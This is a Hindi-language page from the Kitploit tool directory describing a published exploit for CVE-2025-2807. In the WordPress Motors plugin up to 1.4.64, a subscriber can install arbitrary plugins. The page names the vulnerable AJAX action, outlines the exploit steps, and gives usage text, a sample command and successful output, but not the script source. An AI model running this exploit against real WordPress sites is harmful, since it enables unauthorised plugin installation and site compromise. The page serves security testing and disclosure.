Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-2807 — Wordpress - Motors Plugin <= 1.4.64 - मनमाना प्लगइन स्थापना भेद्यता | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-2807
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubnxploited/cve-2025-2807

CVE-2025-2807

Wordpress - Motors Plugin <= 1.4.64 - मनमाना प्लगइन स्थापना भेद्यता

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-2807: Motors प्लगइन <= 1.4.64 - मनमाना प्लगइन स्थापना भेद्यता

शोषण द्वारा: Nxploited | Khaled Alenazi


⚠️ भेद्यता सारांश

प्लगइन: Motors (<= 1.4.64)
प्रकार: प्रमाणित (सब्सक्राइबर+) के लिए लापता प्राधिकरण - मनमाना प्लगइन स्थापना
गंभीरता: 8.8 (CVSS v3)
खोज तिथि: 07 अप्रैल 2025
VDP: नहीं


🔥 शोषण प्रभाव

यह भेद्यता किसी भी प्रमाणित WordPress उपयोगकर्ता (सब्सक्राइबर+) को बिना किसी उचित प्राधिकरण जांच के मनमाना प्लगइन स्थापित करने की अनुमति देती है।

mvl_setup_wizard_install_plugin फ़ंक्शन में क्षमता सत्यापन की कमी के कारण, एक निम्न-विशेषाधिकार प्राप्त उपयोगकर्ता प्रशासकों के लिए आरक्षित कार्य कर सकता है।

📅 इसकी सरलता और गंभीर प्रभाव के कारण बड़े पैमाने पर शोषण किए जाने की उम्मीद है।


🚫 तकनीकी विवरण

  • संवेदनशील एंडपॉइंट: /wp-admin/admin-ajax.php
  • संवेदनशील क्रिया: mvl_setup_wizard_install_plugin
  • आवश्यक पहुंच स्तर: सब्सक्राइबर+ (लॉग-इन उपयोगकर्ता)
  • मुख्य मुद्दा: current_user_can('install_plugins') या इसी तरह की क्षमता जांच का अभाव

🚀 शोषण स्क्रिप्ट (Python)

यह स्क्रिप्ट:

  1. एक सब्सक्राइबर के रूप में लॉग इन करती है
  2. आवश्यक नॉन्स निकालती है (HTML या JS से)
  3. आपकी पसंद का प्लगइन स्थापित करने के लिए संवेदनशील AJAX कॉल को ट्रिगर करती है

📃 उपयोग

root@kitploit:~
usage: CVE-2025-2807.py [-h] -u URL -un USERNAME -p PASSWORD [-pn PLUGIN]

CVE-2025-2807 के लिए शोषण द्वारा: Nxploited | Khaled Alenazi

options:
  -h, --help            यह सहायता संदेश दिखाएं और बाहर निकलें
  -u, --url URL         WordPress साइट का आधार URL
  -un, --username USERNAME     सब्सक्राइबर उपयोगकर्ता नाम
  -p, --password PASSWORD      सब्सक्राइबर पासवर्ड
  -pn, --plugin PLUGIN         स्थापित करने के लिए प्लगइन (डिफ़ॉल्ट: contact-form-7)

🐞 निष्पादन उदाहरण

root@kitploit:~
python3 CVE-2025-2807.py -u http://192.168.1.100/wordpress -un subscriber -p 123456 -pn contact-form-7

आउटपुट:

root@kitploit:~
[*] लॉगिन कर रहा है...
[+] सफलतापूर्वक लॉगिन किया गया।
[*] सेटअप विज़ार्ड पृष्ठ लाया जा रहा है...
[+] HTML में नॉन्स मिला: 428cdf8347
[*] प्लगइन स्थापित करने का प्रयास: contact-form-7
[+] प्लगइन स्थापना अनुरोध सफलतापूर्वक भेजा गया!
[+] प्रतिक्रिया: {"success":true,"data":"Plugin succesfully activated"}


✨ Nxploited (Khaled Alenazi) द्वारा शोषण

टूल डाउनलोड करें